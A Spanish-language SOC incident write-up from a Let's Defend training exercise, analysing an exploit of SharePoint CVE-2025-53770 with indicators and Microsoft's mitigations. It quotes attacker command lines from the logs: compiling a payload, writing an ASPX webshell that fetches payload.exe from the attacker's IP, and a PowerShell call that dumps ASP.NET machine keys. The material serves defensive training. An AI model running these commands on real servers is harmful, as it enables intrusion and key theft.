Una actividad para entrenar habilidades de análisis e informes
Esta es una investigación realizada en la plataforma Let's Defend, basada en un CVE reciente de SharePoint. Echemos un vistazo.
La regla SOC342 detectó una solicitud POST no autenticada dirigida a la página vulnerable ToolPane.aspx, que presenta:
un payload grande (Content-Length: 7699)
un referer sospechoso (SignOut.aspx) probablemente usado para ofuscar el origen
comportamiento consistente con la explotación de la vulnerabilidad ToolShell
Un usuario externo (IP: 107.191.58.76) envió una solicitud manipulada a un servidor SharePoint interno (172.16.20.17).
Analice el registro de nuestro endpoint
Un proceso w3wp.exe ejecutando un comando PowerShell codificado puede indicar una posible actividad de explotación o post-explotación (por ejemplo, ejecución de un payload oculto).
En un entorno de SharePoint, es importante verificar si este comportamiento es esperado o si representa un abuso.
El comando ha sido ofuscado usando base64
Este payload permite al atacante extraer e imprimir claves críticas de configuración ASP.NET de la máquina en la que se ejecuta.
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /out:C:\Windows\Temp\payload.exe C:\Windows\Temp\payload.cs
"C:\Windows\System32\cmd.exe" /c echo <form runat="server"> <object classid="clsid:ADB880A6-D8FF-11CF-9377-00AA003B7A11"><param name="Command" value="Redirect"> <param name="Button" value="Test"> <param name="Url" value="http://107.191.58.76/payload.exe\"> > C:\Program Files\Common Files\Microsoft Shared\Web Server Extensions\16\TEMPLATE\LAYOUTS\spinstall0.aspx
Compila un ejecutable a partir del código fuente C# en el servidor.
Crea una puerta trasera web (archivo ASPX malicioso) en la ruta de SharePoint, que al ser visitada permite ejecutar o descargar un payload externo.
cmd.exe /c echo > C:\Program Files\Common Files\Microsoft Shared\Web Server Extensions\16\TEMPLATE\LAYOUTS\spinstall0.aspx
Este comando crea un archivo llamado spinstall0.aspx en la carpeta LAYOUTS de SharePoint y escribe el contenido en él (aquí es un marcador de posición que representa el código de una webshell)
Este es el hash de spinstall0.apx 92bb4ddb98eeaf11fc15bb32e71d0a63256a0ed826a03ba293ce3a8bf057a514
Echemos un vistazo en VirusTotal.

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "[System.Web.Configuration.MachineKeySection]::GetApplicationConfig()"
Este comando permite al atacante acceder a la configuración de aplicación de MachineKeySection, que puede exponer claves criptográficas sensibles como la clave de validación y la clave de descifrado.
Estas claves son críticas para la seguridad de ASP.NET, protegiendo cosas como cookies de autenticación y ViewState.
Exponer o recuperar estas claves puede permitir a los atacantes falsificar tokens de autenticación, descifrar datos protegidos o realizar otros ataques contra la aplicación web.
MITRE ATT&CK

Nota del analista:
La alerta se generó debido a una actividad inusual de PowerShell observada en un servidor SharePoint, que posteriormente se determinó como un intento de explotación dirigido a CVE-2025-53770. El atacante inicialmente dejó y compiló un ejecutable C# personalizado (payload.exe) usando el compilador C# (csc.exe), luego creó una webshell ASPX maliciosa (spinstall0.aspx) dentro de un directorio de SharePoint accesible web. Posteriormente, se ejecutó un comando de PowerShell para recuperar claves criptográficas sensibles de la máquina de la configuración del servidor a través de la reflexión de .NET. Esta secuencia de acciones sugiere un ataque de múltiples fases diseñado para mantener un control persistente y posiblemente falsificar tokens de autenticación. La webshell fue verificada como maliciosa con una tasa de detección de VirusTotal de 39/62. El incidente se confirma como un verdadero positivo, y se recomiendan medidas adicionales de contención y remediación.

Detalle de CVE-2025-53770
La deserialización de datos no confiables en Microsoft SharePoint Server local permite que un atacante no autorizado ejecute código a través de una red. Microsoft tiene conocimiento de que existe un exploit para CVE-2025-53770 en la naturaleza. Microsoft está preparando y probando completamente una actualización integral para abordar esta vulnerabilidad. Mientras tanto, asegúrese de que la mitigación proporcionada en esta documentación de CVE esté implementada para estar protegido contra la explotación.

Mitigación sugerida por Microsoft:
Utilice versiones compatibles de SharePoint Server local
Aplique las últimas actualizaciones de seguridad enlazadas arriba.
Implemente la protección de Microsoft Defender para Endpoint, o soluciones de amenazas equivalentes
Asegúrese de que la Interfaz de Escaneo Antimalware (AMSI) esté activada y configurada correctamente, con una solución antivirus adecuada como Defender Antivirus
Rote las claves de máquina ASP.NET del servidor SharePoint
IoC
Spinstall0.aspx Web shell utilizada por actores de amenazas
Los actores también han modificado el nombre del archivo de varias maneras, como spinstall.aspx, spinstall1.aspx, spinstall2.aspx
Este informe se basa en una actividad realizada en la plataforma Let's Defend. Todos los hallazgos y materiales presentados son solo con fines educativos. Todos los derechos y propiedad pertenecen a Let's Defend.